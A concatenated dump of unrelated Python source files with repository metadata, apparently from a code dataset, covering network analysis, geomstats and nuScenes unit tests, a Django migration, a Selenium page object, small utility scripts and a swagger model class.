else:
fd.write(",{}".format(seen_id))
user_fds[user_id][1] = ts
for (fd, last_ts) in user_fds.values():
fd.close()
# Graph using networkx
if 1:
idx = random.sample(xrange(len(timestamps)), 25)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
G = networkx.Graph(edges)
networkx.draw(G)
fig_fname = os.path.join(r"C:\Users\Jon\Google Drive\Grad_School\CS 538\project\scripts\figures", "%s.png" % ts)
plt.savefig(fig_fname)
plt.close()
networks = []
n_networks = []
max_size = []
idx = random.sample(xrange(len(timestamps)), 1500)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
nodes = sorted(set(reduce(list.__add__, map(list, edges))))
new_networks = get_networks(nodes, edges)
networks.append(new_networks)
n_networks.append(len(new_networks))
max_size.append(max(map(len,new_networks)))
fd = open("output2.csv", 'w')
for vals in zip(sample_dts, n_networks, max_size):
fd.write(','.join(map(str,(vals))))
fd.write('\n')
fd.close()
# Get networks
if 0:
networks = []
n_networks = []
max_size = []
idx = random.sample(xrange(len(timestamps)), 1500)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
nodes = sorted(set(reduce(list.__add__, map(list, edges))))
new_networks = get_networks(nodes, edges)
networks.append(new_networks)
n_networks.append(len(new_networks))
max_size.append(max(map(len,new_networks)))
fd = open("output2.csv", 'w')
for vals in zip(sample_dts, n_networks, max_size):
fd.write(','.join(map(str,(vals))))
fd.write('\n')
fd.close()
| 37.247573
| 121
| 0.59377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 443
| 0.057735
|
49ea4f99ec3b4e468aba9dc32ef313173fda7ba3
| 6,995
|
py
|
Python
|
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | 2
|
2020-01-23T04:01:02.000Z
|
2020-08-18T19:20:27.000Z
|
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | null | null | null |
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | null | null | null |
"""Unit tests for the General Linear group."""
import warnings
import tests.helper as helper
import geomstats.backend as gs
import geomstats.tests
from geomstats.geometry.general_linear import GeneralLinear
RTOL = 1e-5
class TestGeneralLinear(geomstats.tests.TestCase):
def setUp(self):
gs.random.seed(1234)
self.n = 3
self.n_samples = 2
self.group = GeneralLinear(n=self.n)
self.group_pos = GeneralLinear(self.n, positive_det=True)
warnings.simplefilter('ignore', category=ImportWarning)
def test_belongs_shape(self):
mat = gs.eye(3)
result = self.group.belongs(mat)
self.assertAllClose(gs.shape(result), ())
mat = gs.ones((3, 3))
result = self.group.belongs(mat)
self.assertAllClose(gs.shape(result), ())
def test_belongs(self):
mat = gs.eye(3)
result = self.group.belongs(mat)
expected = True
self.assertAllClose(result, expected)
mat = gs.ones((3, 3))
result = self.group.belongs(mat)
expected = False
self.assertAllClose(result, expected)
mat = gs.ones(3)
result = self.group.belongs(mat)
expected = False
self.assertAllClose(result, expected)
def test_belongs_vectorization_shape(self):
mats = gs.array([gs.eye(3), gs.ones((3, 3))])
result = self.group.belongs(mats)
self.assertAllClose(gs.shape(result), (2,))
def test_belongs_vectorization(self):
mats = gs.array([gs.eye(3), gs.ones((3, 3))])
result = self.group.belongs(mats)
expected = gs.array([True, False])
self.assertAllClose(result, expected)
def test_random_and_belongs(self):
for group in [self.group, self.group_pos]:
point = group.random_point()
result = group.belongs(point)
self.assertTrue(result)
def test_random_and_belongs_vectorization(self):
n_samples = 4
expected = gs.array([True] * n_samples)
for group in [self.group, self.group_pos]:
point = group.random_point(n_samples)
result = group.belongs(point)
self.assertAllClose(result, expected)
def test_compose(self):
mat1 = gs.array([
[1., 0.],
[0., 2.]])
mat2 = gs.array([
[2., 0.],
[0., 1.]])
result = self.group.compose(mat1, mat2)
expected = 2. * GeneralLinear(2).identity
self.assertAllClose(result, expected)
def test_inv(self):
mat_a = gs.array([
[1., 2., 3.],
[4., 5., 6.],
[7., 8., 10.]])
imat_a = 1. / 3. * gs.array([
[-2., -4., 3.],
[-2., 11., -6.],
[3., -6., 3.]])
expected = imat_a
result = self.group.inverse(mat_a)
self.assertAllClose(result, expected)
def test_inv_vectorized(self):
mat_a = gs.array([
[0., 1., 0.],
[1., 0., 0.],
[0., 0., 1.]])
mat_b = - gs.eye(3, 3)
result = self.group.inverse(gs.array([mat_a, mat_b]))
expected = gs.array([mat_a, mat_b])
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_log_and_exp(self):
point = 5 * gs.eye(self.n)
group_log = self.group.log(point)
result = self.group.exp(group_log)
expected = point
self.assertAllClose(result, expected)
def test_exp_vectorization(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
expected = gs.array([[[7.38905609, 0., 0.],
[0., 20.0855369, 0.],
[0., 0., 54.5981500]],
[[2.718281828, 0., 0.],
[0., 148.413159, 0.],
[0., 0., 403.42879349]]])
expected = gs.cast(expected, gs.float64)
point = gs.cast(point, gs.float64)
result = self.group.exp(point)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_log_vectorization(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
expected = gs.array([[[0.693147180, 0., 0.],
[0., 1.09861228866, 0.],
[0., 0., 1.38629436]],
[[0., 0., 0.],
[0., 1.609437912, 0.],
[0., 0., 1.79175946]]])
result = self.group.log(point)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_orbit(self):
point = gs.array([
[gs.exp(4.), 0.],
[0., gs.exp(2.)]])
sqrt = gs.array([
[gs.exp(2.), 0.],
[0., gs.exp(1.)]])
identity = GeneralLinear(2).identity
path = GeneralLinear(2).orbit(point)
time = gs.linspace(0., 1., 3)
result = path(time)
expected = gs.array([identity, sqrt, point])
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_orbit_vectorization(self):
point = gs.array([
[gs.exp(4.), 0.],
[0., gs.exp(2.)]])
sqrt = gs.array([
[gs.exp(2.), 0.],
[0., gs.exp(1.)]])
identity = GeneralLinear(2).identity
path = GeneralLinear(2).orbit(gs.stack([point] * 2), identity)
time = gs.linspace(0., 1., 3)
result = path(time)
expected = gs.array([identity, sqrt, point])
expected = gs.stack([expected] * 2)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_expm_and_logm_vectorization_symmetric(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
result = self.group.exp(self.group.log(point))
expected = point
self.assertAllClose(result, expected)
def test_projection_and_belongs(self):
shape = (self.n_samples, self.n, self.n)
result = helper.test_projection_and_belongs(self.group, shape)
for res in result:
self.assertTrue(res)
def test_projection_and_belongs_pos(self):
shape = (self.n_samples, self.n, self.n)
result = helper.test_projection_and_belongs(self.group_pos, shape)
for res in result:
self.assertTrue(res)
| 32.840376
| 74
| 0.501358
| 6,769
| 0.967691
| 0
| 0
| 2,496
| 0.356826
| 0
| 0
| 54
| 0.00772
|
49eb7a1d598ee46402c3d994c365fef1314082ef
| 454
|
py
|
Python
|
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
from unittest import TestCase
import os,sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import feladatok
class TestEBetukSzama6(TestCase):
def test_feladat06(self):
aktualis = feladatok.ebetuk_szama("")
elvart = 0
self.assertEqual(elvart, aktualis, "Nem jól határozta meg az e vagy é betűk számát")
| 32.428571
| 92
| 0.746696
| 227
| 0.493478
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.121739
|
49ebafbb9bb001087a55a6aebb22dbde9671371c
| 271
|
py
|
Python
|
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
from utils.Driver import Driver
from pages.base_page import BasePage
from pages.locators import MainPageLocators
class MainPage(BasePage):
def __init__(self, driver: Driver):
self.locators = MainPageLocators
super().__init__(driver=driver)
| 27.1
| 44
| 0.734317
| 151
| 0.557196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
49edf4b8c87add119d94e632341ab23299a577d3
| 1,726
|
py
|
Python
|
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-16 07:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.DateTimeField(auto_now_add=True)),
('last_active', models.DateTimeField(auto_now=True)),
('first_player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='game_first_player', to=settings.AUTH_USER_MODEL)),
('next_to_move', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games_to_move', to=settings.AUTH_USER_MODEL)),
('second_player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='game_second_player', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Move',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('x', models.IntegerField()),
('y', models.IntegerField()),
('comment', models.CharField(max_length=300)),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Game')),
],
),
]
| 42.097561
| 162
| 0.636153
| 1,502
| 0.87022
| 0
| 0
| 0
| 0
| 0
| 0
| 253
| 0.146582
|
49ee2e293e1b411f588dd752ab4762901a62db20
| 7,801
|
py
|
Python
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 475
|
2021-03-13T16:33:36.000Z
|
2022-03-30T06:00:39.000Z
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 50
|
2021-03-17T04:48:20.000Z
|
2022-03-08T13:55:32.000Z
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 98
|
2021-03-14T12:12:49.000Z
|
2022-03-19T16:19:13.000Z
|
import math
import unittest
import torch
from nuscenes.prediction.models import mtp
class TestMTPLoss(unittest.TestCase):
"""
Test each component of MTPLoss as well as the
__call__ method.
"""
def test_get_trajectories_and_modes(self):
loss_n_modes_5 = mtp.MTPLoss(5, 0, 0)
loss_n_modes_1 = mtp.MTPLoss(1, 0, 0)
xy_pred = torch.arange(60).view(1, -1).repeat(1, 5).view(-1, 60)
mode_pred = torch.arange(5).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing many modes with batch size 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing many modes with batch size > 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
xy_pred = torch.arange(60).view(1, -1).repeat(1, 1).view(-1, 60)
mode_pred = torch.arange(1).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing one mode with batch size 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing one mode with batch size > 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
def test_angle_between_trajectories(self):
def make_trajectory(last_point):
traj = torch.zeros((12, 2))
traj[-1] = torch.Tensor(last_point)
return traj
loss = mtp.MTPLoss(0, 0, 0)
# test angle is 0.
self.assertEqual(loss._angle_between(make_trajectory([0, 0]), make_trajectory([0, 0])), 0.)
self.assertEqual(loss._angle_between(make_trajectory([15, 15]), make_trajectory([15, 15])), 0.)
# test angle is 15.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([math.sqrt(3)/2, 0.5])), 15., places=4)
# test angle is 30.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([math.sqrt(3)/2, 0.5])), 30., places=4)
# test angle is 45.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([0, 1])), 45., places=4)
# test angle is 90.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([-1, 1])), 90., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([0, 1])), 90., places=4)
# test angle is 180.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([-1, 0])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([0, 1]),
make_trajectory([0, -1])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([3, 1]),
make_trajectory([-3, -1])), 180., places=4)
def test_compute_best_mode_nothing_below_threshold(self):
angles = [(90, 0), (80, 1), (70, 2)]
target = None
traj = None
loss = mtp.MTPLoss(3, 0, 5)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
loss = mtp.MTPLoss(3, 0, 65)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
def test_compute_best_mode_only_one_below_threshold(self):
angles = [(30, 1), (3, 0), (25, 2)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_compute_best_mode_multiple_below_threshold(self):
angles = [(2, 2), (4, 1), (10, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
trajectory[1] = 1
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 1)
def test_compute_best_mode_only_one_mode(self):
angles = [(25, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((1, 6, 2))
loss = mtp.MTPLoss(1, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
trajectory[0] = 1
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_loss_single_mode(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 61))
predictions[:, :60] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, 60] = 1/10
loss = mtp.MTPLoss(1, 1, angle_threshold_degrees=20)
# Only regression loss in single mode case.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
0, places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, :60] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()), 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, :60] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
(15/16)*0.5,
places=4)
def test_loss_many_modes(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 610))
predictions[:, 540:600] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, -10:] = 1/10
loss = mtp.MTPLoss(10, 1, angle_threshold_degrees=20)
# Since one mode exactly matches gt, loss should only be classification error.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10), places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, 540:600] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, 540:600] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + (15/16)*0.5,
places=4)
| 42.396739
| 106
| 0.58313
| 7,711
| 0.988463
| 0
| 0
| 0
| 0
| 0
| 0
| 849
| 0.108832
|
49ef52693c6a396a1581cc399d1886b8613380b6
| 1,067
|
py
|
Python
|
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python3
# Convert Yosys JSON to simple text hypergraph for performance testing
import sys, json
node_count = 0
edge2node = {}
netlist = None
with open(sys.argv[1]) as jf:
netlist = json.load(jf)
top_module = None
for name, module in sorted(netlist["modules"].items()):
if "attributes" not in module:
continue
if "top" not in module["attributes"]:
continue
if int(module["attributes"]["top"]) == 0:
continue
top_module = module
break
for cname, cell in sorted(top_module["cells"].items()):
if "connections" not in cell:
continue
for pname, bits in sorted(cell["connections"].items()):
for bit in bits:
if bit in ("0", "1", "x", "z"):
continue
if bit not in edge2node:
edge2node[bit] = set()
edge2node[bit].add(node_count)
node_count += 1
with open(sys.argv[2], "w") as hf:
print("{} {}".format(node_count, len(edge2node)), file=hf)
for n in range(node_count):
print("N 0 0", file=hf)
for e, nodes in sorted(edge2node.items()):
print("E 1 {}".format(" ".join([str(x) for x in sorted(nodes)])), file=hf)
| 24.25
| 76
| 0.665417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 220
| 0.206186
|
49f13b101323835947d8e0f19cb369eece2aefcf
| 3,966
|
py
|
Python
|
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | 1
|
2020-02-18T12:52:02.000Z
|
2020-02-18T12:52:02.000Z
|
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | null | null | null |
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | null | null | null |
from Tkinter import *
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
master = Tk()
goal = 0
var_goal = StringVar()
GAMMA = 0.9
last_state = Variable(torch.Tensor([0,0,0,0,0,0])).unsqueeze(0)
last_action = 0
last_reward = 0
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
self.lstm = nn.LSTMCell(6, 6)
self.fc = nn.Linear(6, 2)
#self.softmax = nn.LogSoftmax()
self.states = []
self.next_states = []
self.actions = []
self.rewards = []
self.hiddens = []
self.cells = []
def forward(self, input, hidden):
hx,cx = self.lstm(input,hidden)
output = self.fc(hx)
#output = self.softmax(output)
return output, hx, cx
def initHidden(self):
self.cell_state = Variable(torch.zeros(1,6))
self.hidden_state = Variable(torch.zeros(1,6))
model = Policy()
model.initHidden()
last_hidden = model.hidden_state
last_cell = model.cell_state
optimizer = optim.Adam(model.parameters(), lr=0.01)
def select_action(state):
output, model.hidden_state, model.cell_state = model(state, [model.hidden_state, model.cell_state])
print('val '+str(output.data))
probs = F.softmax(output)
print('probs '+str(probs.data))
action = probs.multinomial()
return action.data[0,0]
def learn(indice):
state = model.states[indice]
next_state = model.next_states[indice].detach()
action = model.actions[indice]
reward = model.rewards[indice]
hidden = model.hiddens[indice]
cell = model.cells[indice]
output, next_hidden, next_cell = model(state, [hidden, cell])
value = output[0,action]
output,_,_ = model(next_state, [next_hidden.detach(), next_hidden.detach()])
#'''
next_action_probs = F.softmax(output)
next_action = next_action_probs.multinomial().data[0,0]
next_value = output[0,next_action]
'''
next_value = output.max(1)[0]
#'''
expected = GAMMA*next_value + reward
td_loss = F.smooth_l1_loss(value, expected)
optimizer.zero_grad()
td_loss.backward(retain_variables=True)
optimizer.step()
def update(signal):
global last_action
global last_state
global last_reward
global last_hidden
global last_cell
state = Variable(torch.Tensor([signal,signal,signal,signal,signal,signal]).float()).unsqueeze(0)
if np.abs(last_reward)>0 or np.random.rand()>0.9 or len(model.states)<10:
model.states.append(last_state)
model.next_states.append(state)
model.rewards.append(last_reward)
model.actions.append(last_action)
model.hiddens.append(last_hidden)
model.cells.append(last_cell)
last_hidden = model.hidden_state
last_cell = model.cell_state
action = select_action(state)
print(action)
reward = 0
if action==1 and goal==1:
reward = 1
if action==1 and goal==0:
reward = -1
if action==0:
learn(np.random.choice(len(model.states)))
else:
learn(-1)
last_action = action
last_state = state
last_reward = reward
def set_goal(new_goal):
global goal
goal = new_goal
print("goal = "+str(goal))
var_goal.set('goal = '+str(goal))
Button(master, text='S1', height = 10, width = 30, command=lambda:update(0)).grid(row=0, column=0, sticky=W, pady=4)
Button(master, text='S2', height = 10, width = 30, command=lambda:update(1)).grid(row=0, column=1, sticky=W, pady=4)
Button(master, text='goal 0', height = 10, width = 30, command=lambda:set_goal(0)).grid(row=1, column=0, sticky=W, pady=4)
Button(master, text='goal 1', height = 10, width = 30, command=lambda:set_goal(1)).grid(row=1, column=1, sticky=W, pady=4)
Label(master, height = 10, textvariable = var_goal).grid(row=2, sticky=EW, pady=4)
mainloop( )
| 28.73913
| 122
| 0.660111
| 670
| 0.168936
| 0
| 0
| 0
| 0
| 0
| 0
| 167
| 0.042108
|
49f1fc4e36bfb8c6234c3e939d335df6e0c3dae5
| 500
|
py
|
Python
|
Engine/Shaders/compile_all_shader.py
|
ValtoGameEngines/Fish-Engine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 240
|
2017-02-17T10:08:19.000Z
|
2022-03-25T14:45:29.000Z
|
Engine/Shaders/compile_all_shader.py
|
ValtoGameEngines/Fish-Engine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 2
|
2016-10-12T07:08:38.000Z
|
2017-04-05T01:56:30.000Z
|
Engine/Shaders/compile_all_shader.py
|
yushroom/FishEngine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 39
|
2017-03-02T09:40:07.000Z
|
2021-12-04T07:28:53.000Z
|
import os
import sys
compiler = r'../Binary/RelWithDebInfo/ShaderCompiler'
#compiler = r'../Binary/Debug/ShaderCompiler'
shader_dirs = ['.', './Editor']
count = 0
for d in shader_dirs:
for fn in os.listdir(d):
print(fn)
ext = fn.split('.')[-1]
if ext in ['surf', 'shader']:
cmd = compiler + ' ' + os.path.abspath(os.path.join(d, fn))
print(cmd)
if os.system(cmd) != 0:
print("Compile ERROR: ", fn)
sys.exit()
count += 1
print("Done. {} shaders compiled.".format(count))
| 22.727273
| 62
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 165
| 0.33
|
49f2ebec4bd34c27d749eb184a9d941a3fa4ea04
| 14,058
|
py
|
Python
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 55
|
2019-05-09T06:43:05.000Z
|
2021-12-08T05:56:43.000Z
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 5
|
2019-09-08T15:33:28.000Z
|
2021-04-17T17:30:53.000Z
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 16
|
2019-08-08T07:15:35.000Z
|
2021-12-07T15:34:41.000Z
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from rbb_swagger_server.models.base_model_ import Model
from rbb_swagger_server.models.simulation_environment_detailed import SimulationEnvironmentDetailed # noqa: F401,E501
from rbb_swagger_server.models.simulation_run_detailed import SimulationRunDetailed # noqa: F401,E501
from rbb_swagger_server.models.simulation_summary import SimulationSummary # noqa: F401,E501
from rbb_swagger_server.models.task_detailed import TaskDetailed # noqa: F401,E501
from rbb_swagger_server import util
class SimulationDetailed(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, detail_type: str=None, identifier: int=None, description: str=None, created: datetime=None, result: int=None, environment_name: str=None, queued_task_identifier: str=None, queued_task_state: int=None, config: object=None, on_complete_action: object=None, environment: SimulationEnvironmentDetailed=None, runs: List[SimulationRunDetailed]=None, queued_task: TaskDetailed=None): # noqa: E501
"""SimulationDetailed - a model defined in Swagger
:param detail_type: The detail_type of this SimulationDetailed. # noqa: E501
:type detail_type: str
:param identifier: The identifier of this SimulationDetailed. # noqa: E501
:type identifier: int
:param description: The description of this SimulationDetailed. # noqa: E501
:type description: str
:param created: The created of this SimulationDetailed. # noqa: E501
:type created: datetime
:param result: The result of this SimulationDetailed. # noqa: E501
:type result: int
:param environment_name: The environment_name of this SimulationDetailed. # noqa: E501
:type environment_name: str
:param queued_task_identifier: The queued_task_identifier of this SimulationDetailed. # noqa: E501
:type queued_task_identifier: str
:param queued_task_state: The queued_task_state of this SimulationDetailed. # noqa: E501
:type queued_task_state: int
:param config: The config of this SimulationDetailed. # noqa: E501
:type config: object
:param on_complete_action: The on_complete_action of this SimulationDetailed. # noqa: E501
:type on_complete_action: object
:param environment: The environment of this SimulationDetailed. # noqa: E501
:type environment: SimulationEnvironmentDetailed
:param runs: The runs of this SimulationDetailed. # noqa: E501
:type runs: List[SimulationRunDetailed]
:param queued_task: The queued_task of this SimulationDetailed. # noqa: E501
:type queued_task: TaskDetailed
"""
self.swagger_types = {
'detail_type': str,
'identifier': int,
'description': str,
'created': datetime,
'result': int,
'environment_name': str,
'queued_task_identifier': str,
'queued_task_state': int,
'config': object,
'on_complete_action': object,
'environment': SimulationEnvironmentDetailed,
'runs': List[SimulationRunDetailed],
'queued_task': TaskDetailed
}
self.attribute_map = {
'detail_type': 'detail_type',
'identifier': 'identifier',
'description': 'description',
'created': 'created',
'result': 'result',
'environment_name': 'environment_name',
